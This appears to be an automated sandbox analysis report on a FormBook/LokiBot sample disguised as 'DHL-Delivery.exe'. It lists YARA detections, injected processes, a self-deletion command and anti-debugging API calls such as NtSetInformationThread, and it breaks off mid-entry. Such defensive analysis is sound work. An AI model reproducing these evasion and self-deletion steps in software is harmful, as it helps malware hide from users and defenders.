                      MD5 hash:C25CF941EE6C7927C0A2AB0CB7FABE0B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000007.00000002.2756480379.000000001593F000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F, Description: Semiautomatic generated rule - file scan copy.pdf.r11, Source: 00000007.00000002.2756480379.000000001593F000.00000004.00000001.sdmp, Author: Florian Roth
                      Reputation:low

                      General

                      Start time:10:32:48
                      Start date:05/01/2021
                      Path:C:\Windows\SysWOW64\cmmon32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\cmmon32.exe
                      Imagebase:0x1350000
                      File size:36352 bytes
                      MD5 hash:DEAA709A71519E24B72574A666A82C2D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000A.00000002.3586431196.0000000000D98000.00000004.00000020.sdmp, Author: Florian Roth
                      • Rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F, Description: Semiautomatic generated rule - file scan copy.pdf.r11, Source: 0000000A.00000002.3586431196.0000000000D98000.00000004.00000020.sdmp, Author: Florian Roth
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.3584082067.0000000000C90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.3584082067.0000000000C90000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.3584082067.0000000000C90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.3592997034.0000000001280000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.3592997034.0000000001280000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.3592997034.0000000001280000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000A.00000002.3609825836.000000000519F000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F, Description: Semiautomatic generated rule - file scan copy.pdf.r11, Source: 0000000A.00000002.3609825836.000000000519F000.00000004.00000001.sdmp, Author: Florian Roth
                      Reputation:low

                      General

                      Start time:10:32:52
                      Start date:05/01/2021
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:/c del 'C:\Users\user\Desktop\DHL-Delivery.exe'
                      Imagebase:0x1180000
                      File size:236032 bytes
                      MD5 hash:C43699F84A68608E7E57C43B7761BBB8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low

                      General

                      Start time:10:32:52
                      Start date:05/01/2021
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff645930000
                      File size:822272 bytes
                      MD5 hash:C221707E5CE93515AC87507E19181E2A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:10:33:30
                      Start date:05/01/2021
                      Path:C:\Windows\System32\WerFault.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\WerFault.exe -u -p 4472 -s 4464
                      Imagebase:0x7ff7ec180000
                      File size:509968 bytes
                      MD5 hash:875E5FDA571C26F3F6F53F603150497F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low

                      General

                      Start time:10:33:43
                      Start date:05/01/2021
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:explorer.exe
                      Imagebase:0x7ff7add70000
                      File size:4413936 bytes
                      MD5 hash:C25CF941EE6C7927C0A2AB0CB7FABE0B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low

                      General

                      Start time:10:33:50
                      Start date:05/01/2021
                      Path:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      Wow64 process (32bit):false
                      Commandline:'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                      Imagebase:0x7ff638470000
                      File size:12084232 bytes
                      MD5 hash:456EC8ADD234A97E7E4DFACE9DABA5EB
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low

                      Disassembly

                      Code Analysis

                        Execution Graph

                        Execution Coverage:2%
                        Dynamic/Decrypted Code Coverage:81%
                        Signature Coverage:47.1%
                        Total number of Nodes:622
                        Total number of Limit Nodes:54

                        Graph


                        Executed Functions

                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID: W.E$1.!T$4l?R$4l?R$ntdll$F8
                        • API String ID: 543350213-1431527072
                        • Opcode ID: 1ab7c80bd8f054495e80a9b2f2b2c7e2b1e8353bfa0c1b5d5fb5961421367e81
                        • Instruction ID: 30d62e06631f35278c0fcd50218e6231353892eee021bde8d1131c3376a33e83
                        • Opcode Fuzzy Hash: 1ab7c80bd8f054495e80a9b2f2b2c7e2b1e8353bfa0c1b5d5fb5961421367e81
                        • Instruction Fuzzy Hash: A5A22F7CBC4346AEEF216D748DB57E62367AF127A0FD9412ADC86871C1D376C48AC602
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                          • Part of subcall function 021AA407: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021A9C94,00000040,021A0A1C,00000000,00000000,00000000,00000000,?,00000000,00000000,021A841B), ref: 021AA423
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                        • String ID: "Bp0$"Bp0$1.!T$GT`$nTAz$ntdll
                        • API String ID: 449006233-3043025367
                        • Opcode ID: 084e60d350767497deb26374e19bbf8d0b91c14f689888e5504926c4e912f5a3
                        • Instruction ID: 70a2ff4d6a016e9e447287f22e95528a8650fc327622c99f401ebfbfd3e7c568
                        • Opcode Fuzzy Hash: 084e60d350767497deb26374e19bbf8d0b91c14f689888e5504926c4e912f5a3
                        • Instruction Fuzzy Hash: CB32AC6CBC43429EDF259E7489B43E677A39F17360F99826ECC928B1C6D325C486C613
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: 1.!T$ntdll
                        • API String ID: 1029625771-1346282702
                        • Opcode ID: fb72fee9565bcae30420d2c452b95b68a1b2054da5f2e66320e9a9dc29f7541a
                        • Instruction ID: de70dbac0a546b652c0c6de74447cd7670a757c495a42a15d0f354fa140c3d3b
                        • Opcode Fuzzy Hash: fb72fee9565bcae30420d2c452b95b68a1b2054da5f2e66320e9a9dc29f7541a
                        • Instruction Fuzzy Hash: 1562CE7C7C1306AEFF252D688DB17E633A7AF12390FD54129EC86871C5D7A684CAC642
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 1876017897-1346282702
                        • Opcode ID: 550fac49bd80446cc8e972711a445b9590d39b4880e671c54bbbb90dabc65362
                        • Instruction ID: 541fdd7bc1af3d151948ca54c5f9322f502bb6dcec2d612b06892eb3893c3763
                        • Opcode Fuzzy Hash: 550fac49bd80446cc8e972711a445b9590d39b4880e671c54bbbb90dabc65362
                        • Instruction Fuzzy Hash: 8CF1EF2C6C93469EEF39597489B43FA23A39F16764FDA416BCCA387081D366C485C643
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 543350213-1346282702
                        • Opcode ID: 2c19c2a2abcaab1d07352d9948f70eb66a3423691e8e714f4ffc6e632fe3add6
                        • Instruction ID: f650c45c7da5eef756f59b6588570e092a79eeb9a3802bf82ffdea76f6ec2f16
                        • Opcode Fuzzy Hash: 2c19c2a2abcaab1d07352d9948f70eb66a3423691e8e714f4ffc6e632fe3add6
                        • Instruction Fuzzy Hash: E652E079BC43179FEB249D288DB07D673A7BF16360F954229DCA683181D735C88AC742
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationThread
                        • String ID: -+BC$1.!T$ntdll
                        • API String ID: 4046476035-1050246477
                        • Opcode ID: a1d9a9b305ae8ba232114e04648e1c10266d8483a7a79536c1281402c60c1064
                        • Instruction ID: 946c1239a8a0b268c7f54cfd8562f931a4bb17748066e7036215e87608f1458d
                        • Opcode Fuzzy Hash: a1d9a9b305ae8ba232114e04648e1c10266d8483a7a79536c1281402c60c1064
                        • Instruction Fuzzy Hash: 4FE11D78BC834BAEEB319D348DB57EA37A7AF12390FC44129DC468B081E376C449C652
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 543350213-1346282702
                        • Opcode ID: 9b692f5d9082abccd69b293d73f84b31e400494cc1b01f937345093b110dc8c5
                        • Instruction ID: 44e742ed5b349c3339dd6b1dfe262a295134d14242795f57191764109082e9fc
                        • Opcode Fuzzy Hash: 9b692f5d9082abccd69b293d73f84b31e400494cc1b01f937345093b110dc8c5
                        • Instruction Fuzzy Hash: 40C11D6CBC63575EEF21687849B53EA23978F127A0FD9417ADC8383082E766C48AC543
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 1.!T$ntdll
                        • API String ID: 0-1346282702
                        • Opcode ID: fabb34166a68f042159e9a03ea72993303a4350e57e7d144a7be8d9bb36f3c1e
                        • Instruction ID: 70aa0f1b8c4e2f05351aaeacc2bc6ac6c2923b6a81b0380e8947845f8ba94f23
                        • Opcode Fuzzy Hash: fabb34166a68f042159e9a03ea72993303a4350e57e7d144a7be8d9bb36f3c1e
                        • Instruction Fuzzy Hash: 96C10C7CAC63575EEF2169788CB53EA37A79F02760FD5406ADC82C7182E3A5C44AC643
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        APIs
                        • EnumWindows.USER32(021A0882,?,00000000), ref: 021A082D
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: EnumInformationThreadWindows
                        • String ID: 1.!T$ntdll
                        • API String ID: 1954852945-1346282702
                        • Opcode ID: 3e50a86c3d308bf16ab60c32165385e318a45d1fb95cbf7a2fc11b2c4236fe54
                        • Instruction ID: 823feddd994be8781a05da40a1a6d2a27043d7151e32ffa03fdf7764512a5075
                        • Opcode Fuzzy Hash: 3e50a86c3d308bf16ab60c32165385e318a45d1fb95cbf7a2fc11b2c4236fe54
                        • Instruction Fuzzy Hash: FCA13D3CAC53674EEB1199748CB23DA37939F17360F9941A9DC82C7182D76AC44AC683
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeLibraryLoadThunk
                        • String ID: ntdll
                        • API String ID: 3353482560-3337577438
                        • Opcode ID: 9e59f69d005c88b24fc4f86477335ac156e03bd598e9c3d21ce69973796808ea
                        • Instruction ID: 059eb32fc9e8019551231b2fc664d5807b289c7ec8cfc2ce177f311a2056c230
                        • Opcode Fuzzy Hash: 9e59f69d005c88b24fc4f86477335ac156e03bd598e9c3d21ce69973796808ea
                        • Instruction Fuzzy Hash: D832CB387C53879EEB209E788CB17E537A7AF12780FD94119DD82871C5C7BA848AC752
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 4046476035-1346282702
                        • Opcode ID: 20feef2997f90c6870751af68dffee7f3ee6281b5a4a34fefc3e8aff7e8ff326
                        • Instruction ID: dbdaf63d0e8739a683ba123b5a6db38e9a37990079734e3976cfcc37a623c73c
                        • Opcode Fuzzy Hash: 20feef2997f90c6870751af68dffee7f3ee6281b5a4a34fefc3e8aff7e8ff326
                        • Instruction Fuzzy Hash: 42C1FF7DACA3A74FEB1299744CB53D537A39F23710F9941AADC42CB182D366C40AC693
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 4046476035-1346282702
                        • Opcode ID: de670667a438489caac56c0207ff5a92c69a6fcf1c6f273c9e12f233e996dfa2
                        • Instruction ID: 0476f129d884493d58b319f5a3a2f0dc9d7c98b4a4a8f407e2a76b36c8091c8e
                        • Opcode Fuzzy Hash: de670667a438489caac56c0207ff5a92c69a6fcf1c6f273c9e12f233e996dfa2
                        • Instruction Fuzzy Hash: 7BA1FB3CBC63564EEB11A9788CB13D637979F16720FD940A9DC82CB182D365C44AC683
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 543350213-1346282702
                        • Opcode ID: 5feaf40ca66c10ee5e420fb850f7818b33b67c9e6ca58035fa1294f044e9e9ba
                        • Instruction ID: 2da7869e8098189d19b2188bdd6c3a9b98fec5172994814f4a13e159fbb8dcb0
                        • Opcode Fuzzy Hash: 5feaf40ca66c10ee5e420fb850f7818b33b67c9e6ca58035fa1294f044e9e9ba
                        • Instruction Fuzzy Hash: B3A11E7CAC53974EEB119D748CB23DA37939F16750FD940AADC42C7182E7AAC44AC683
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 4046476035-1346282702
                        • Opcode ID: 2c4976fdf1817095b8a1ec2193cd0a7a9c3038e6d18068578fe16c90a409d7e3
                        • Instruction ID: 4a9a7ec1dca11ef6aba08520bc721d481c884c6884cc00363f6eef1ef1862922
                        • Opcode Fuzzy Hash: 2c4976fdf1817095b8a1ec2193cd0a7a9c3038e6d18068578fe16c90a409d7e3
                        • Instruction Fuzzy Hash: 0F91FC3CBC63A74EEB1199748CB23DA37978F17760FD841A9DC4287182D7AAC44AC583
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 1.!T$ntdll
                        • API String ID: 0-1346282702
                        • Opcode ID: 2ebb8ed6f1a06eef740cbf60d87e16b048ddb084866d7d4536530eae5b4ebe66
                        • Instruction ID: 2b458f7350f130ab3770dd40b05f2236169a145ba2f1f2b035c223bcdf27229e
                        • Opcode Fuzzy Hash: 2ebb8ed6f1a06eef740cbf60d87e16b048ddb084866d7d4536530eae5b4ebe66
                        • Instruction Fuzzy Hash: 73910E3CAC63A74EEB1199748CB63DA37A79F17710FD840A9DC42C7182D7AAC44AC593
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 4046476035-1346282702
                        • Opcode ID: 44464e2a788f813f464d0f03c7bb93e23e2da01cbde8fa44aa47e402ac56c1db
                        • Instruction ID: 4767a7085e6889b6cdb17fe43f874273a3838c97e4894e8ebd88e597377321ea
                        • Opcode Fuzzy Hash: 44464e2a788f813f464d0f03c7bb93e23e2da01cbde8fa44aa47e402ac56c1db
                        • Instruction Fuzzy Hash: 33910D3CBC63A74EEB1299748CB23D937A79F17710F9840A9DC42C7182D7AAC44AC593
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 4046476035-1346282702
                        • Opcode ID: 49ae5f5c72d97e18eba281f052780e0afdc4a8004c4d83c97cf9b822881ee85b
                        • Instruction ID: f48d97caba53b25e580b349e5e667bc6c6ac1c2d97c6e754430e6810074774fc
                        • Opcode Fuzzy Hash: 49ae5f5c72d97e18eba281f052780e0afdc4a8004c4d83c97cf9b822881ee85b
                        • Instruction Fuzzy Hash: EA811C38AC53A74EEB1199748CB23DA37979F17750FD840A9DC4287182D7AAC44AC593
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 4046476035-1346282702
                        • Opcode ID: cff1a24e04f539c95b2ef4392e5a0d7916bae071ef86896b9b818f3a27c18e79
                        • Instruction ID: 6b4965cd2ac3f0391c98ead350f2c4201cbdb7c49318d944f9e03e01840c5d3d
                        • Opcode Fuzzy Hash: cff1a24e04f539c95b2ef4392e5a0d7916bae071ef86896b9b818f3a27c18e79
                        • Instruction Fuzzy Hash: 05810D38AC63A71EEB1199748CF63D937978F16710FD840A9DC42CB182D766C44AC593
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 4046476035-1346282702
                        • Opcode ID: 8b2c6e65db91209495512550340120e4f3acaabc303b4273ca822f8d1c7a94f9
                        • Instruction ID: 2b877d1a28b2672cfea621eb8b337c2d5610acdca15c058c28cb4d4b2935a739
                        • Opcode Fuzzy Hash: 8b2c6e65db91209495512550340120e4f3acaabc303b4273ca822f8d1c7a94f9
                        • Instruction Fuzzy Hash: A771FD38BCA3A70EEB1199748CB63D937A79F16750F9800A9DD42CB182D766C14AC693
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 4046476035-1346282702
                        • Opcode ID: 321209d8e1987ef8f414950ee3f27a6c92e5ab4f555a125bcbbb88cbd634770c
                        • Instruction ID: 1312bf806257f1461d82dad56ce70c56a23f8bb93e29b6bc906d8158a4e884c3
                        • Opcode Fuzzy Hash: 321209d8e1987ef8f414950ee3f27a6c92e5ab4f555a125bcbbb88cbd634770c
                        • Instruction Fuzzy Hash: 1E71DB38ACA3A74EDB1199748CB63D937A39F16650F8841ADD842CB182D76AC14BC693
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 543350213-1346282702
                        • Opcode ID: b3a4556a13ee1dedd385a2cf9d37934a31c4ec21a7ae9f478791367d48ac745d
                        • Instruction ID: 07ea82010914adf59ee787765af29c63b1e2fdf1ce2561f1366e91aeb61388dd
